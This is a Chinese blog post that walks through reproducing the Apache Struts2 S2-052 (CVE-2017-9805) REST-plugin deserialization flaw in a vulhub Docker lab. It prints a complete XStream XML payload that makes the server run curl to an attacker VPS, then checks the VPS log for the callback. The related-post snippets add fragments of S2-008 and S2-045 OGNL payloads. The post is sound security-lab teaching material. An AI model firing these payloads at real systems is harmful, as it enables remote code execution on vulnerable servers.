【vulhub】structs2远程代码执行漏洞 CVE-2017-9805(S2-052)

最新推荐文章于 2024-05-26 09:51:42 发布
最新推荐文章于 2024-05-26 09:51:42 发布
阅读量506 收藏 2
点赞数
分类专栏: structs2 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121751367
版权

前言

2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。

影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

一、启动靶机

docker-compose build

docker-compose up -d

二、构造payload

访问URL,点击Edit编辑,产生请求包
URL:

http://192.168.150.146:8080/orders.xhtml

在这里插入图片描述
将请求转换POST,Content-Type改为application/xml,请求体添加下面xml数据:

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>curl</string>
                        <string>http://vps_ip/Hacker</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

三、发送payload

在这里插入图片描述

四、检验

在VPS上的apache日志有靶机的请求记录

tail -n 1 -f /var/log/apache2/access.log

在这里插入图片描述

参考

https://blog.csdn.net/qq_29647709/article/details/84954575

Crazy_Yu8
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2代码执行漏洞
收集盒 Book box
06-28 613
刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞, 具体的漏洞说明地址 https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt  还是热乎的,我大概白话一下。 这个漏洞的级别很高,都升级修补一下。  影响版本是2.3.1和2.3.1之前的版本 解
Struts2 远程代码执行漏洞复现(附Struts2漏洞检测工具)
告白的博客
02-24 6904
Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。该框架多版本存在远程代码执行
探索Apache Struts漏洞CVE-2017-9805的解决方案:struts-pwn工具包
最新发布
gitblog_00096的博客
05-26 443
探索Apache Struts漏洞CVE-2017-9805的解决方案:struts-pwn工具包 项目地址:https://gitcode.com/mazen160/struts-pwn_CVE-2017-9805 在这个快速发展的数字时代中,安全问题始终是应用程序开发的核心关注点。Apache Struts作为一款广受欢迎的MVC框架,其安全性直接影响到依赖它的数百万Web应用。然而,就像任何...
[Vulfocus解题系列] Struts2-052远程代码执行漏洞CVE-2017-9805
00勇士王子的博客
07-14 2232
漏洞介绍 名称: struts2-052 远程代码执行CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2366
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
vulhubS2-008漏洞复现
qq_45300786的博客
07-08 415
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
最后,s2-017(CVE-2017-9791)是2017年的另一个反序列化漏洞,它影响了Struts2的StrutsRequestWrapper类。攻击者可以利用这个漏洞,通过发送恶意的HTTP请求,触发系统的反序列化过程,执行任意代码。 为了应对这些...
E046-服务漏洞利用及加固-利用structs2实现远程命令执行.pdf
12-02
本文将深入探讨一个安全漏洞的利用与加固,特别是如何利用Structs2框架中的漏洞实现远程命令执行。该课程以E046为主题,涵盖了网络安全领域的一个重要问题,即服务漏洞的利用和防御策略。我们将首先了解实验环境,...
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
STS2G:Struts2漏洞扫描利用工具 - Golang版. Struts2 Scanner Written in Golang
05-07
012struts2-013struts2-015struts2-016struts2-045struts2-046struts2-048struts2-053struts2-057开发目的1、适用于命令行下操作,比如webshell下测试内网struts2漏洞.2、可编译Windows/Linux平台可执行文件.3、单...
Struts2 远程代码执行漏洞复现(S2-001)
Welcome To Myon'Blog !
03-14 1076
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
struts漏洞总结
Fiverya的博客
01-17 2755
struts2漏洞,从S2-001到 S2-061,嘿嘿。
Struts2漏洞
2403_82795493的博客
02-20 2034
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 8937
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
vulhub-structs2-S2-009 远程代码执行漏洞复现
qq_56426046的博客
06-19 255
影响版本: 2.1.0 - 2.3.1.1。
Structs2系列漏洞 S2-001漏洞复现
weixin_43885355的博客
03-31 368
Structs2系列漏洞 S2-001漏洞复现 参考链接: https://blog.csdn.net/qq_29647709/article/details/84945159 0x01漏洞简介         该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{
S2-052 远程代码执行漏洞
EC_Carrot的博客
08-12 524
漏洞简介 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md 漏洞复现 访问http://your-ip:8080/orders.xhtml即可看到showcase页面,由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改o
vulhubStructs2 S2-045 远程代码执行漏洞CVE-2017-5638)
weixin_42884199的博客
12-07 537
前言 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload payload1: Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data 在请求头插入上述payload 三、漏洞利用 payload2: Content-Type:
Structs2漏洞 045
05-28
Structs2漏洞045(CVE-2017-5638)是一个严重的漏洞,它允许攻击者通过在HTTP请求中注入恶意的表达式语言(EL)代码执行任意命令,从而完全控制受影响的系统。该漏洞是由于Struts2框架中的一个不安全的文件上传功能所导致的。 具体来说,攻击者可以通过构造一个恶意的文件上传请求,向目标系统上传一个包含恶意EL代码的文件。当服务器尝试解析上传的文件时,恶意的EL代码将被执行,导致系统被攻击者完全控制。 该漏洞的特征包括: 1. Struts2框架中的文件上传功能存在漏洞; 2. 攻击者可以通过向目标系统上传包含恶意EL代码的文件来执行任意命令; 3. 攻击者可以通过此漏洞完全控制受影响的系统。 为了避免受到该漏洞的影响,建议用户立即升级到Struts2的最新版本,或者禁用文件上传功能。同时,建议用户对所有上传的文件进行严格的验证和过滤,以防止攻击者上传包含恶意EL代码的文件。此外,也可以使用Web应用程序防火墙(WAF)等工具来防范此类攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值